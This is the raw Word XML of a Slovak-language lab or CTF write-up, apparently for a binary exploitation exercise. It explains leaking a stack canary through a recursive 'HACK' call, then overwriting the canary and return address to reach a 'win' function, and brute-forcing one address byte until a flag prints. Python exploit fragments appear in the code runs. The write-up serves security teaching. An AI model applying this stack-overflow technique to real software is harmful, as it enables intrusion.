                      <w:pPr>
                        <w:spacing w:after="0"/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B050">
                              <w14:alpha w14:val="60000"/>
                            </w14:srgbClr>
                          </w14:shadow>
                        </w:rPr>
                        <w:t>Buffer</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r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02BA9" wp14:editId="0E332FE5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1195070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>435610</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3500437" cy="176213"/>
                <wp:effectExtent l="19050" t="19050" r="24130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7" cy="1762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BE50" id="Rectangle 32" o:spid="_x0000_s1026" style="position:absolute;margin-left:94.1pt;margin-top:34.3pt;width:275.6pt;height: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" filled="f" strokecolor="#00b050" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00211E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440DD6" wp14:editId="15F832E9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1195388</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>859473</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2547937" cy="142875"/>
                <wp:effectExtent l="19050" t="19050" r="2413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937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019C" id="Rectangle 37" o:spid="_x0000_s1026" style="position:absolute;margin-left:94.15pt;margin-top:67.7pt;width:200.6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" filled="f" strokecolor="#00b050" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0073020D" w:rsidRPr="0073020D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5273F1B0" wp14:editId="1C7B73FD">
            <wp:extent cx="5570703" cy="1425063"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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52AD" w14:textId="77777777" w:rsidR="005666D2" w:rsidRDefault="005666D2" w:rsidP="0010552D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEAC834" w14:textId="4CC9ABB6" w:rsidR="00B14BBA" w:rsidRPr="00B14BBA" w:rsidRDefault="00B14BBA" w:rsidP="00B14B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. Prepísanie kanárika a návratovej adresy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDC9454" w14:textId="2C9A1809" w:rsidR="0010552D" w:rsidRPr="0010552D" w:rsidRDefault="00140EB2" w:rsidP="0010552D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Funkcia</w:t>
      </w:r>
      <w:r w:rsidR="00C543D8" w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> nám umožňuje ju rekurzívne zavolať, keď vstupný reťazec obsahuje „HACK“, </w:t>
      </w:r>
      <w:r w:rsidR="00865291" w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">vďaka čomu </w:t>
      </w:r>
      <w:r w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>v prvom volaní nájdeme kanárika</w:t>
      </w:r>
      <w:r w:rsidR="006D19BD">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00865291" w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">a v rekurzívnom volaní </w:t>
      </w:r>
      <w:r w:rsidR="002B49BB" w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">prepíšeme kanárika na </w:t>
      </w:r>
      <w:r w:rsidR="0010552D" w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">jeho </w:t>
      </w:r>
      <w:r w:rsidR="00F0543D" w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hodnotu z prvého volania</w:t>
      </w:r>
      <w:r w:rsidR="002B49BB" w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a návratovú adresu na win</w:t>
      </w:r>
      <w:r w:rsidR="00F0543D" w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> funkciu</w:t>
      </w:r>
      <w:r w:rsidR="002B49BB" w:rsidRPr="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0010552D">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE1A78">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keďže sme posledný bajt kanárika prepísali, musíme ho naspäť doplniť. </w:t>
      </w:r>
      <w:r w:rsidR="00F55181">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Posledný bajt adresy win bol fixný, </w:t>
      </w:r>
      <w:r w:rsidR="003853D4">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">za </w:t>
      </w:r>
      <w:r w:rsidR="00F55181">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>predposledný sme dosadili náhodný bajt a program sme spúšťali v cykle dovtedy, kým nebola adresa správna a nezískali sme flag.</w:t>
      </w:r>
      <w:r w:rsidR="00EE1A78">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DBE31F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</w:p>
    <w:p w14:paraId="15A4E971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ntex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error'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729C4AF8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0F511C3" w14:textId="35303532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006666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</w:p>
    <w:p w14:paraId="15758440" w14:textId="77777777" w:rsidR="00415B1C" w:rsidRDefault="00415B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</w:p>
    <w:p w14:paraId="04B767D8" w14:textId="6712123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6666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007B87B0" w14:textId="77777777" w:rsidR="00B25BCD" w:rsidRDefault="00B25B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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B51BC1F" w14:textId="7BC99C3B" w:rsidR="002B49BB" w:rsidRDefault="00B25B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\n--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iteracia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8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"--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5F0A3D3" w14:textId="77777777" w:rsidR="00B25BCD" w:rsidRDefault="00B25B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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E96BE0" w14:textId="06F4909E" w:rsidR="002B49BB" w:rsidRDefault="002B49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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00B25BCD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#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volanie 1 –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najdeme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kanarika</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FFB97C2" w14:textId="7797C6D2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</w:p>
    <w:p w14:paraId="11F9C093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ces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/memory_level_7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55D8BBD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200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0C69E4F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3EB435EF" w14:textId="14A4946B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HACK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69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retazec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proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E4057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dlzky</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E4057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2285E79F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613716B" w14:textId="50526C16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nary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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>94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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>94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D19BD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najdenie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kanarika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vo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vypise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32F2C141" w14:textId="4228E043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nary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"0x"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canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[::-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+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"00"</w:t>
      </w:r>
      <w:r w:rsidR="006D19BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="006D19BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D19BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>otocenie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00415B1C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, doplnenie NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ECBAF9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nary_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64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anar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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16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prevod na bajty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CDAC91" w14:textId="0C8C4D9A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CANARY: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nar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canary_byte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E61DC71" w14:textId="5222913C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32A9739" w14:textId="6D7F81A2" w:rsidR="00B25BCD" w:rsidRDefault="00B25B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</w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF69CBD" w14:textId="77777777" w:rsidR="00B25BCD" w:rsidRDefault="00B25B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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00CE8A7D" w14:textId="61685494" w:rsidR="002B49BB" w:rsidRDefault="002B49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B25BCD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#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rekurzivne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volanie –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prepiseme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kanarika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 w:rsidR="0010552D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00B25BCD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adresu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5360584E" w14:textId="77777777" w:rsidR="002B49BB" w:rsidRPr="002B49BB" w:rsidRDefault="002B49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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B52A382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lin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200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39CF142" w14:textId="0D991F5B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46549E41" w14:textId="2ABE8561" w:rsidR="003853D4" w:rsidRPr="003853D4" w:rsidRDefault="003853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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#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offset </w:t>
      </w:r>
      <w:r w:rsidR="001D00F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>72B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kanarik</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D00F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8B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+ offset 8B +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posledne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2 bajty adresy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525E8B3B" w14:textId="2B0E8A7F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72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canary_bytes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A"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"\x90\x</w:t>
      </w:r>
      <w:r w:rsidR="00B30FFF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2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01039CB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n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7D56A9F2" w14:textId="4B30D4E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00C2A6B9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bispp_flag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4682B9C9" w14:textId="77777777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E90680D" w14:textId="3102CD10" w:rsidR="00ED3B9A" w:rsidRDefault="00ED3B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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78165169" w14:textId="07160A55" w:rsidR="00ED3B9A" w:rsidRDefault="00ED3B9A" w:rsidP="00B86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471340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14:paraId="22AA879C" w14:textId="2FC4C52B" w:rsidR="0000329A" w:rsidRDefault="00B30FFF" w:rsidP="00F56622">
      <w:r w:rsidRPr="00B30FFF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ACCD6C4" wp14:editId="6047D4FD">
            <wp:extent cx="5731510" cy="2093595"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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29A" w:rsidSect="003200A9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4D27C" w14:textId="77777777" w:rsidR="00287BCE" w:rsidRDefault="00287BCE" w:rsidP="0064176A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="45227E9F" w14:textId="77777777" w:rsidR="00287BCE" w:rsidRDefault="00287BCE" w:rsidP="0064176A">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="282BE48B" w14:textId="77777777" w:rsidR="00287BCE" w:rsidRDefault="00287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75F2" w14:textId="77777777" w:rsidR="00287BCE" w:rsidRDefault="00287BCE" w:rsidP="0064176A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4AAEE7AA" w14:textId="77777777" w:rsidR="00287BCE" w:rsidRDefault="00287BCE" w:rsidP="0064176A">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="4676B749" w14:textId="77777777" w:rsidR="00287BCE" w:rsidRDefault="00287B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E05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2149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43D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71C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A2A96"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12047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D1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4772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D52CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36FE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37BFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A580C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19B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E58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F3210"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B48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35BF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF5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13094"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25AEE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46F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5FDCF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375"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B7E1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79B0491"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D64A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FE1C9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6F00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3BE8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0756C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7BA4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E1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76456"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="130C0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0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15"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="11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"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride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3"/>
    <w:rsid w:val="0000329A"/>
    <w:rsid w:val="00007C91"/>
    <w:rsid w:val="0001058D"/>
    <w:rsid w:val="00013470"/>
    <w:rsid w:val="000136EA"/>
    <w:rsid w:val="000336BC"/>
    <w:rsid w:val="00040836"/>
    <w:rsid w:val="000463B0"/>
    <w:rsid w:val="0004753D"/>
    <w:rsid w:val="000535D8"/>
    <w:rsid w:val="00077AE7"/>
    <w:rsid w:val="00082382"/>
    <w:rsid w:val="00095FF0"/>
    <w:rsid w:val="00096ACE"/>
    <w:rsid w:val="000B5A52"/>
    <w:rsid w:val="000C3308"/>
    <w:rsid w:val="000D551A"/>
    <w:rsid w:val="0010552D"/>
    <w:rsid w:val="00106436"/>
    <w:rsid w:val="00124F70"/>
    <w:rsid w:val="00127CAC"/>
    <w:rsid w:val="00140EB2"/>
    <w:rsid w:val="00144D38"/>
    <w:rsid w:val="001623E6"/>
    <w:rsid w:val="001728BD"/>
    <w:rsid w:val="00173314"/>
    <w:rsid w:val="00177102"/>
    <w:rsid w:val="001A364C"/>
    <w:rsid w:val="001A3B01"/>
    <w:rsid w:val="001B347C"/>
    <w:rsid w:val="001C09F4"/>
    <w:rsid w:val="001D00F4"/>
    <w:rsid w:val="001E0CD9"/>
    <w:rsid w:val="00202103"/>
    <w:rsid w:val="002022F8"/>
    <w:rsid w:val="00211E37"/>
    <w:rsid w:val="0023675E"/>
    <w:rsid w:val="00244359"/>
    <w:rsid w:val="0025178C"/>
    <w:rsid w:val="0025475D"/>
    <w:rsid w:val="00287BCE"/>
    <w:rsid w:val="002922C3"/>
    <w:rsid w:val="002A1BF9"/>
    <w:rsid w:val="002A7A3B"/>
    <w:rsid w:val="002B0D7E"/>
    <w:rsid w:val="002B49BB"/>
    <w:rsid w:val="002C08DF"/>
    <w:rsid w:val="002C6738"/>
    <w:rsid w:val="002D39F0"/>
    <w:rsid w:val="002E2D9D"/>
    <w:rsid w:val="002E654C"/>
    <w:rsid w:val="002F748C"/>
    <w:rsid w:val="002F76EC"/>
    <w:rsid w:val="00301914"/>
    <w:rsid w:val="00314EDA"/>
    <w:rsid w:val="003200A9"/>
    <w:rsid w:val="0032724C"/>
    <w:rsid w:val="00327DDE"/>
    <w:rsid w:val="0034075A"/>
    <w:rsid w:val="003447DA"/>
    <w:rsid w:val="00351A40"/>
    <w:rsid w:val="00352E27"/>
    <w:rsid w:val="00361ED5"/>
    <w:rsid w:val="003758ED"/>
    <w:rsid w:val="00375B73"/>
    <w:rsid w:val="00382150"/>
    <w:rsid w:val="003853D4"/>
    <w:rsid w:val="003910A0"/>
    <w:rsid w:val="003932E7"/>
    <w:rsid w:val="00397D53"/>
    <w:rsid w:val="003B33BC"/>
    <w:rsid w:val="003B615F"/>
    <w:rsid w:val="003C7FFD"/>
    <w:rsid w:val="003D5E39"/>
    <w:rsid w:val="003F43A4"/>
    <w:rsid w:val="003F515E"/>
    <w:rsid w:val="004048AD"/>
    <w:rsid w:val="00415B1C"/>
    <w:rsid w:val="00425E91"/>
    <w:rsid w:val="00427A99"/>
    <w:rsid w:val="00432786"/>
    <w:rsid w:val="004421C4"/>
    <w:rsid w:val="004464F8"/>
    <w:rsid w:val="0045156E"/>
    <w:rsid w:val="004621DB"/>
    <w:rsid w:val="00472016"/>
    <w:rsid w:val="00475F93"/>
    <w:rsid w:val="004813F2"/>
    <w:rsid w:val="00484749"/>
    <w:rsid w:val="0049198F"/>
    <w:rsid w:val="004C1622"/>
    <w:rsid w:val="004C7E80"/>
    <w:rsid w:val="004D0ECA"/>
    <w:rsid w:val="004D7542"/>
    <w:rsid w:val="004D7DF7"/>
    <w:rsid w:val="004E4057"/>
    <w:rsid w:val="00504CA1"/>
    <w:rsid w:val="00507AF6"/>
    <w:rsid w:val="00513D64"/>
    <w:rsid w:val="00513EA3"/>
    <w:rsid w:val="00523BC6"/>
    <w:rsid w:val="00544A2D"/>
    <w:rsid w:val="00544F36"/>
    <w:rsid w:val="00561E9B"/>
    <w:rsid w:val="005666D2"/>
    <w:rsid w:val="00584011"/>
    <w:rsid w:val="005B0C23"/>
    <w:rsid w:val="005D11E6"/>
    <w:rsid w:val="005D6DBF"/>
    <w:rsid w:val="005D7020"/>
    <w:rsid w:val="005E119E"/>
    <w:rsid w:val="005E2751"/>
    <w:rsid w:val="005F0329"/>
    <w:rsid w:val="005F0DF1"/>
    <w:rsid w:val="005F69DD"/>
    <w:rsid w:val="00605716"/>
    <w:rsid w:val="0061658A"/>
    <w:rsid w:val="00627814"/>
    <w:rsid w:val="00633600"/>
    <w:rsid w:val="00634585"/>
    <w:rsid w:val="0064176A"/>
    <w:rsid w:val="006448A6"/>
    <w:rsid w:val="00654404"/>
    <w:rsid w:val="00656386"/>
    <w:rsid w:val="006B5C75"/>
    <w:rsid w:val="006D19BD"/>
    <w:rsid w:val="006E7BF5"/>
    <w:rsid w:val="006F08BE"/>
    <w:rsid w:val="006F0A2B"/>
    <w:rsid w:val="00705500"/>
    <w:rsid w:val="0073020D"/>
    <w:rsid w:val="0075283F"/>
    <w:rsid w:val="0075437B"/>
    <w:rsid w:val="00765EDE"/>
    <w:rsid w:val="0077711E"/>
    <w:rsid w:val="00786FFE"/>
    <w:rsid w:val="0079414C"/>
    <w:rsid w:val="007B14C5"/>
    <w:rsid w:val="007B28BA"/>
    <w:rsid w:val="007C2B35"/>
    <w:rsid w:val="007D3D6A"/>
    <w:rsid w:val="007E2A91"/>
    <w:rsid w:val="007E7F35"/>
    <w:rsid w:val="007F14DB"/>
    <w:rsid w:val="0080071A"/>
    <w:rsid w:val="008023CF"/>
    <w:rsid w:val="00802F72"/>
    <w:rsid w:val="00804959"/>
    <w:rsid w:val="00850469"/>
    <w:rsid w:val="00853594"/>
    <w:rsid w:val="00865291"/>
    <w:rsid w:val="00885026"/>
    <w:rsid w:val="00896613"/>
    <w:rsid w:val="008A00B3"/>
    <w:rsid w:val="008A1D6F"/>
    <w:rsid w:val="008A6F21"/>
    <w:rsid w:val="008A7C77"/>
    <w:rsid w:val="008B4709"/>
    <w:rsid w:val="008B56B0"/>
    <w:rsid w:val="008C2A88"/>
    <w:rsid w:val="008C629A"/>
    <w:rsid w:val="008C6E03"/>
    <w:rsid w:val="008D5284"/>
    <w:rsid w:val="008D7927"/>
    <w:rsid w:val="008E4C87"/>
    <w:rsid w:val="008E7F8B"/>
    <w:rsid w:val="008F65EB"/>
    <w:rsid w:val="00910CEB"/>
    <w:rsid w:val="00912FB9"/>
    <w:rsid w:val="0091497A"/>
    <w:rsid w:val="009149D7"/>
    <w:rsid w:val="00920FC3"/>
    <w:rsid w:val="00925387"/>
    <w:rsid w:val="00937843"/>
    <w:rsid w:val="009413C4"/>
    <w:rsid w:val="00943572"/>
    <w:rsid w:val="00966B9A"/>
    <w:rsid w:val="0096794B"/>
    <w:rsid w:val="00973E6E"/>
    <w:rsid w:val="009772F1"/>
    <w:rsid w:val="009D2F99"/>
    <w:rsid w:val="009E5CB5"/>
    <w:rsid w:val="009F0ADF"/>
    <w:rsid w:val="009F2F89"/>
    <w:rsid w:val="00A07322"/>
    <w:rsid w:val="00A07867"/>
    <w:rsid w:val="00A139C3"/>
    <w:rsid w:val="00A13DC7"/>
    <w:rsid w:val="00A20E93"/>
    <w:rsid w:val="00A2199D"/>
    <w:rsid w:val="00A70B3C"/>
    <w:rsid w:val="00A834C1"/>
    <w:rsid w:val="00AA0324"/>
    <w:rsid w:val="00AA37FD"/>
    <w:rsid w:val="00AC1A8A"/>
    <w:rsid w:val="00AC33F6"/>
    <w:rsid w:val="00AC768A"/>
    <w:rsid w:val="00AE0134"/>
    <w:rsid w:val="00AE11E6"/>
    <w:rsid w:val="00AE3232"/>
    <w:rsid w:val="00AF3768"/>
    <w:rsid w:val="00AF4135"/>
    <w:rsid w:val="00B14BBA"/>
    <w:rsid w:val="00B218A7"/>
    <w:rsid w:val="00B24BA0"/>
    <w:rsid w:val="00B25BCD"/>
    <w:rsid w:val="00B274ED"/>
    <w:rsid w:val="00B30FFF"/>
    <w:rsid w:val="00B3353B"/>
    <w:rsid w:val="00B35D8B"/>
    <w:rsid w:val="00B45D6F"/>
    <w:rsid w:val="00B46E8C"/>
    <w:rsid w:val="00B56CA1"/>
    <w:rsid w:val="00B56DC1"/>
    <w:rsid w:val="00B65F08"/>
    <w:rsid w:val="00B76DB0"/>
    <w:rsid w:val="00B7711B"/>
    <w:rsid w:val="00B77CBA"/>
    <w:rsid w:val="00B837E2"/>
    <w:rsid w:val="00B84C48"/>
    <w:rsid w:val="00B86FCB"/>
    <w:rsid w:val="00B950C1"/>
    <w:rsid w:val="00BB0978"/>
    <w:rsid w:val="00BB0BE6"/>
    <w:rsid w:val="00BE2534"/>
    <w:rsid w:val="00BF3E34"/>
    <w:rsid w:val="00C161D5"/>
    <w:rsid w:val="00C252C5"/>
    <w:rsid w:val="00C543D8"/>
    <w:rsid w:val="00C55008"/>
    <w:rsid w:val="00C55679"/>
    <w:rsid w:val="00C609E4"/>
    <w:rsid w:val="00C665DE"/>
    <w:rsid w:val="00C70F88"/>
    <w:rsid w:val="00C85A32"/>
    <w:rsid w:val="00C91097"/>
